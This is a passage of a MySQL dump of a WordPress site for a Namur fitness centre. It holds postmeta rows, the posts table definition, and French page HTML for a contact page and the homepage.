(2090, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2091, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672144:1\";}\";'),
(2092, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2093, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2094, 460, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2095, 460, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672189:1\";}\";'),
(2096, 460, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2097, 460, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2098, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2099, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672249:1\";}\";'),
(2100, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2101, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2102, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2103, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672309:1\";}\";'),
(2104, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2105, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2106, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2107, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672372:1\";}\";'),
(2108, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2109, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2110, 461, '_wp_attached_file', '2013/11/LesMills.png'),
(2111, 461, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:150;s:6:\"height\";i:36;s:4:\"file\";s:20:\"2013/11/LesMills.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2112, 462, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2113, 462, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672417:1\";}\";'),
(2114, 462, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2115, 462, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2116, 463, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2117, 463, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672461:1\";}\";'),
(2118, 463, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2119, 463, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2120, 464, '_wp_attached_file', '2013/11/LesMills1.png'),
(2121, 464, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:140;s:6:\"height\";i:30;s:4:\"file\";s:21:\"2013/11/LesMills1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2122, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2123, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672591:1\";}\";'),
(2124, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2125, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2126, 465, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2127, 465, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672591:1\";}\";'),
(2128, 465, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2129, 465, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2130, 466, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2131, 466, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672650:1\";}\";'),
(2132, 466, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2133, 466, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2134, 467, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2135, 467, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672677:1\";}\";'),
(2136, 467, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2137, 467, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2138, 468, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2139, 468, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672724:1\";}\";'),
(2140, 468, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2141, 468, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2142, 469, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2143, 469, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672778:1\";}\";'),
(2144, 469, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2145, 469, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2146, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2147, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1418672836:1\";}\";'),
(2148, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2149, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2150, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2151, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606128:1\";}\";'),
(2152, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2153, 365, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(2154, 365, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(2155, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2156, 471, '_menu_item_type', 'post_type'),
(2157, 471, '_menu_item_menu_item_parent', '0'),
(2158, 471, '_menu_item_object_id', '363'),
(2159, 471, '_menu_item_object', 'page'),
(2160, 471, '_menu_item_target', ''),
(2161, 471, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(2162, 471, '_menu_item_xfn', ''),
(2163, 471, '_menu_item_url', ''),
(2169, 473, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2170, 473, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606284:1\";}\";'),
(2171, 473, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2172, 473, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2173, 474, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2174, 474, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606314:1\";}\";'),
(2175, 474, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2176, 474, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2177, 475, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2178, 475, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429607037:1\";}\";'),
(2179, 475, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2180, 475, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(2181, 475, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(2182, 475, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2183, 476, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2184, 476, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429607171:1\";}\";'),
(2185, 476, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2186, 476, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2187, 477, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2188, 477, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429607255:1\";}\";'),
(2189, 477, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2190, 477, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(2191, 477, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(2192, 477, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2193, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2194, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429608787:1\";}\";'),
(2195, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2196, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2197, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2198, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2199, 478, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2200, 478, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609074:1\";}\";'),
(2201, 478, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2202, 478, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2203, 478, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2204, 478, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2205, 479, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2206, 479, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609173:1\";}\";'),
(2207, 479, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2208, 479, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2209, 479, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2210, 479, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2211, 480, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2212, 480, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609231:1\";}\";'),
(2213, 480, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2214, 480, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2215, 480, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2216, 480, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2217, 481, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2218, 481, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609591:1\";}\";'),
(2219, 481, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2220, 481, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(2221, 481, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(2222, 481, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2223, 482, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2224, 482, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429609993:1\";}\";'),
(2225, 482, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2226, 482, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2227, 483, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2228, 483, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429610098:1\";}\";'),
(2229, 483, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2230, 483, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2231, 484, '_wp_attached_file', '2015/04/map.png'),
(2232, 484, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:300;s:6:\"height\";i:236;s:4:\"file\";s:15:\"2015/04/map.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"map-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:15:\"map-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2233, 484, '_edit_lock', '1429610652:1'),
(2234, 485, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2235, 485, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429688270:1\";}\";'),
(2236, 485, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2237, 485, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2238, 486, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2239, 486, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429688300:1\";}\";'),
(2240, 486, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2241, 486, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2242, 487, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2243, 487, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429688360:1\";}\";'),
(2244, 487, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2245, 487, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2246, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2247, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441212784:3\";}\";'),
(2248, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2249, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2250, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2251, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441212799:3\";}\";'),
(2252, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2253, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2254, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(2255, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441212981:3\";}\";'),
(2256, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2257, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2258, 491, '_wp_attached_file', '2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png'),
(2259, 491, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:795;s:6:\"height\";i:561;s:4:\"file\";s:53:\"2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"Capture-d’écran-2015-09-02-à-18.56.23-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"Capture-d’écran-2015-09-02-à-18.56.23-300x211.png\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:53:\"Capture-d’écran-2015-09-02-à-18.56.23-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2260, 492, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2261, 492, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213026:3\";}\";'),
(2262, 492, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2263, 492, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2264, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";');
INSERT INTO `www2_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2265, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213090:3\";}\";'),
(2266, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2267, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2268, 493, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2269, 493, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213134:3\";}\";'),
(2270, 493, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2271, 493, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2272, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2273, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213440:3\";}\";'),
(2274, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2275, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2276, 494, '_wp_attached_file', '2013/11/nouvelles-seances-CT.png'),
(2277, 494, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:635;s:4:\"file\";s:32:\"2013/11/nouvelles-seances-CT.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"nouvelles-seances-CT-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"nouvelles-seances-CT-300x211.png\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:32:\"nouvelles-seances-CT-595x224.png\";s:5:\"width\";i:595;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(2278, 495, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2279, 495, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213455:3\";}\";'),
(2280, 495, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2281, 495, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2282, 496, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2283, 496, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213588:3\";}\";'),
(2284, 496, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2285, 496, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2286, 490, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2287, 490, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213661:3\";}\";'),
(2288, 490, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2289, 490, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2290, 497, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"3\";}\";'),
(2291, 497, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1441213661:3\";}\";'),
(2292, 497, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2293, 497, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";');

-- --------------------------------------------------------

--
-- Structure de la table `www2_posts`
--

CREATE TABLE `www2_posts` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `post_author` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(20) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_posts`
--

INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1, 1, '2013-05-23 18:04:49', '2013-05-23 18:04:49', 'Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!', 'Hello world!', '', 'publish', 'open', 'open', '', 'hello-world', '', '', '2013-05-23 18:04:49', '2013-05-23 18:04:49', '', 0, 'http://www.crosstrainingcenter.be/?p=1', 0, 'post', '', 0),
(328, 1, '2013-07-10 15:47:50', '2013-07-10 15:47:50', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-10 15:47:50', '2013-07-10 15:47:50', '', 9, 'http://www.crosstrainingcenter.be/9-revision-19/', 0, 'revision', '', 0),
(5, 1, '2013-05-23 18:12:51', '2013-05-23 18:12:51', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" 